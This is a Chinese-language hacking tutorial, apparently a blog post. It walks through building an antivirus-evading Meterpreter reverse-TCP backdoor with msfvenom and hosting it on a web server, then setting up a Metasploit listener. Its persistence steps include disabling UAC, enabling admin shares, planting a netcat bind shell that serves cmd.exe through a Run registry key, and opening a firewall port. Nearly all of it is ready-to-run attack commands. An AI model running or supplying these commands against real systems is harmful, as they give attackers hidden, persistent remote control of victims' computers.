- A+
工具msfvenom
生成后门
1 |
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/hou.exe |
-a 指定架构
--platform 指定平台
-b 去掉坏字符,坏字符会影响 payload 正常执行。
扩展:
x00 代表 16 进制的“ 00 ”组成的字符串。通过 ASCII 码换成能识别的就是: :"00" "00000000"
NUL 。由于 " 是不可见字符,所以代码中没用。
-e 指定编码器也就是所谓的免杀。 86/shikata_ga_nai 是 msf 自带的编码器
-i 指定 payload 有效载荷编码次数 。 指定编码加密次数,为了让杀毒软件,更难查出源代码
-f 指定输出格式
-o 指定文件名称和导出位置。 指定到网站根目录 /var/ww/html ,方便在肉机上下载后门程序
监听
1 2 3 4 5 |
sf5 > use exploit/multi/handler msf5 exploit(multi/handler) > show options msf5 exploit(multi/handler) > set lport 4444 msf5 exploit(multi/handler) > set lhost 192.168.1.102 msf5 exploit(multi/handler) > exploit |
后门维持
上传瑞士军刀
关闭UAC
UAC 概述:用户帐户控制(User Account Control,简写作 UAC)是微软公司在其 Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱劢器和系统文件授权,以达到帮劣阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。
1 2 |
meterpreter > shell C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f |
参数说明
ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值
开启 win7 系统主机的默认共享
开启 win7 系统主机的默认共享,默认共享对 Windows 主机的文件共享非常斱便,也斱便黑客利用这个功能,进程执行命令。
1 |
C:\Windows\system32>cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f |
启动nc
1 |
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\\users\\dyan\\nc.exe -Ldp 6666 -e cmd.exe' |
nc 参数解释:
L 表示用户退出违接后重新迚行端口侦听
d 后台运行
p 指定端口
配置防火墙规则
防火墙允许 6666 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。
1 |
C:\Windows\system32> netsh firewall add portopening TCP 6666 "nc6666" ENABLE ALL |
重启靶机
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫